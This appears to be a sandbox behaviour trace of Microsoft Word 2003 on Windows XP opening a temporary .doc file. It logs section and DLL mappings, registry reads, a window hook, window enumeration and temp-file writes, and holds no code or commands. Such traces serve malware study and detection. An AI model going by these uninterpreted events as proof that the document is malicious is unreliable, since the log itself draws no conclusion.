    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 490559103
    Window created Window Name: OpusApp Class Name: OpusApp success 490595605
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: A60000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 490597115
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 490599884
    Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 490606904
    Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: A60000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 490616159
    Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 490619763
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 490624865
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: AA0000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 490627781
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 490631462
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: AA0000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 490633859
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 490637492
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 490639943
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 490653155
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: write and read and execute Type: commit Baseaddress: AB0000 Size: 1753088 Protection: execute Mapped to pid: own pid success or wait 490655382
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: query and read Type: commit Baseaddress: AB0000 Size: 1753088 Protection: readonly Mapped to pid: own pid success or wait 490657843
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg20321106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: C60000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 490660511
    Section loaded Path: \KnownDlls\msi.dll Access: write and read and execute Type: unknown Baseaddress: C60000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 490675067
    Section loaded Path: C:\WINDOWS\system32\msi.dll Access: query and write and read and execute Type: image Baseaddress: 7D1E0000 Size: 2867200 Protection: read write Mapped to pid: own pid success or wait 490676795
    Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Office\11.0\Word Name: MTTT success or wait 490907523
    Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Office\11.0\Word Name: MTTT success or wait 490908016
    Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 268 Hook ID: FFFFFFFF success 491161788
    Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: D00000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 491165979
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 491428207
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: D00000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 491439891
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 491478482
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: D00000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 491489359
    Window created Window Name: _WwC Class Name: _WwC success 491669376
    Window created Window Name: _WwF Class Name: _WwF success 493162833
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 493186051
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 493186346
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 493186645
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: write and read and execute Type: commit Baseaddress: DB0000 Size: 966656 Protection: execute Mapped to pid: own pid success or wait 493201863
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: query and write and read and execute Type: image Baseaddress: 39700000 Size: 962560 Protection: read write Mapped to pid: own pid success or wait 493204814
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 493211815
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493224884
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493228585
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493232211
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493235791
    Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid object name not found 493244502
    Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 493246322
    Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 493249285
    Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 493250099
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 493252549
    Section loaded Path: \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: E50000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 493323038
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: write and read and execute Type: commit Baseaddress: E50000 Size: 368640 Protection: execute Mapped to pid: own pid success or wait 493403349
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 493406768
    Section loaded Path: \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: reserve Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid object name exists 493700570
    Section loaded Path: \KnownDlls\SETUPAPI.dll Access: write and read and execute Type: unknown Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid object name not found 493729144
    Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 493731173
    Section loaded Path: \BaseNamedObjects\DfSharedHeap325F0 Access: query and write and read Type: reserve Baseaddress: FE0000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 494274527
    Section loaded Path: \BaseNamedObjects\DFMap0-206324 Access: query and write and read Type: commit Baseaddress: 13E0000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 494278108
    Section loaded Path: \BaseNamedObjects\DfRoot0000325F0 Access: query and write and read Type: commit Baseaddress: 1460000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 494279930
    Section loaded Path: \BaseNamedObjects\DFMap0-206340 Access: query and write and read Type: commit Baseaddress: 1470000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 494293730
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc Offset: none Length: 54 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 494305304
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~$4.doc Offset: none Length: 108 Value: 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 494306548
    Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 494332243
    Section loaded Path: \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 14F0000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 494377832
    Section loaded Path: \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1500000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 494380322
    Window created Window Name: _WwB Class Name: _WwB success 494389102
    Window created Window Name: _WwG Class Name: _WwG success 494395128
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 494398455
    Window created Window Name: _WwC Class Name: _WwC success 494400283
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 494644714
    Window created Window Name: _WwC Class Name: _WwC success 494760182
    Window created Window Name: _WwC Class Name: _WwC success 494761352
    Window created Window Name: _WwC Class Name: _WwC success 494762879
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1560000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 494837280
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19531106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1560000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 494838290
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 1580000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 494841728
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 494848792
    Section loaded Path: \BaseNamedObjects\Global\RotHintTable Access: read Type: unknown Baseaddress: 1580000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 494862047
    Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 1590000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 494863690
    Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 1590000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 494865152
    Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 1590000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 494865829
    Message posted HWND: 10176 Message: 45F WParam: 0 LParam: 0 success 494896024
    Windows enumerated Desktop: 0 Parent: 4004A Enum Children: true TID: 0 HWNDs: 30050, 30052, 30054, 30064, 10066, 10068, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 494899691
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 494901769
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 494902024
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 494902285
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 494902404
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 494902525
    Section loaded Path: \KnownDlls\SXS.DLL Access: write and read and execute Type: unknown Baseaddress: 1590000 Size: 2904064 Protection: read write Mapped to pid: own pid object name not found 495049322
    Section loaded Path: C:\WINDOWS\system32\sxs.dll Access: query and write and read and execute Type: image Baseaddress: 7E720000 Size: 720896 Protection: read write Mapped to pid: own pid success or wait 495050004
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070106
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070342
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070514
    Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 594 HWNDs: 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 495070699
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 495070926
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1A80000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 495085781
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 495095091
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 495095220
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 495095348
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 1AA0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 495097612
    Message posted HWND: 101B8 Message: 402 WParam: 0 LParam: 0 success 495135653
    Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 1AA0000 Size: 159744 Protection: execute Mapped to pid: own pid object name not found 495156145
    Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 495156908
    Section loaded Path: \KnownDlls\LINKINFO.dll Access: write and read and execute Type: unknown Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid object name not found 495240588
    Section loaded Path: C:\WINDOWS\system32\linkinfo.dll Access: query and write and read and execute Type: image Baseaddress: 76980000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 495241214
    Section loaded Path: \KnownDlls\ntshrui.dll Access: write and read and execute Type: unknown Baseaddress: 76980000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 495297659
    Section loaded Path: C:\WINDOWS\system32\ntshrui.dll Access: query and write and read and execute Type: image Baseaddress: 76990000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 495299280
    Section loaded Path: \KnownDlls\ATL.DLL Access: write and read and execute Type: unknown Baseaddress: 76990000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 495303527
    Section loaded Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 495304230
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 495321818
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 495322515
    Section loaded Path: C:\WINDOWS\system32\ntshrui.dll Access: read Type: commit Baseaddress: 1AB0000 Size: 143360 Protection: readonly Mapped to pid: own pid success or wait 495345293
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 495396506
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497070083
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497074691
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497082052
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497285876
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497311159
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497320229
    Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 1AB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 497322467
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB..JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498796180
    Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.AJH Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AF0000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 498797414
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.B.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498797831
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.C.JOJAC Access: query and write and read Type: commit Baseaddress: 1AD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498798188
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.D.JOJAC Access: query and write and read Type: commit Baseaddress: 1B70000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498798532
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.E.JOJAC Access: query and write and read Type: commit Baseaddress: 1B80000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498798871
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.F.JOJAC Access: query and write and read Type: commit Baseaddress: 1B90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498799216
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.G.JOJAC Access: query and write and read Type: commit Baseaddress: 1BA0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498799560
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.H.JOJAC Access: query and write and read Type: commit Baseaddress: 1BB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498799906
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.I.JOJAC Access: query and write and read Type: commit Baseaddress: 1BC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498800254
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.J.JOJAC Access: query and write and read Type: commit Baseaddress: 1BD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498800603
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.K.JOJAC Access: query and write and read Type: commit Baseaddress: 1BE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498800953
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.L.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498802348
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.M.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498804301
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.N.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498805641
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.O.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498807051
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.P.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498808408
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498809764
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498811172
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498812528
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498813922
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EB.JOJAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498815330
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.O.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498817329
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.P.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498817717
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498818044
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498818366
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.CB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498818689
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.DB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819012
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.EB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819334
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.FB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819657
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.GB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498819979
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.HB.JOJAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 498820576
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FB.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499524699
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GB.ELKAC Access: query and write and read Type: commit Baseaddress: 1AD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499525056
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HB.ELKAC Access: query and write and read Type: commit Baseaddress: 1B70000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499525406
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IB.ELKAC Access: query and write and read Type: commit Baseaddress: 1B80000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499525750
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.JB.ELKAC Access: query and write and read Type: commit Baseaddress: 1B90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499526093
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.KB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BA0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499526437
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.LB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499526780
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.MB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499527122
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.NB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499527468
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.OB.ELKAC Access: query and write and read Type: commit Baseaddress: 1BE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499527820
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.PB.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499529307
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499531175
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499532514
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499533861
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499535267
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499536619
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499537967
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499539380
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499540737
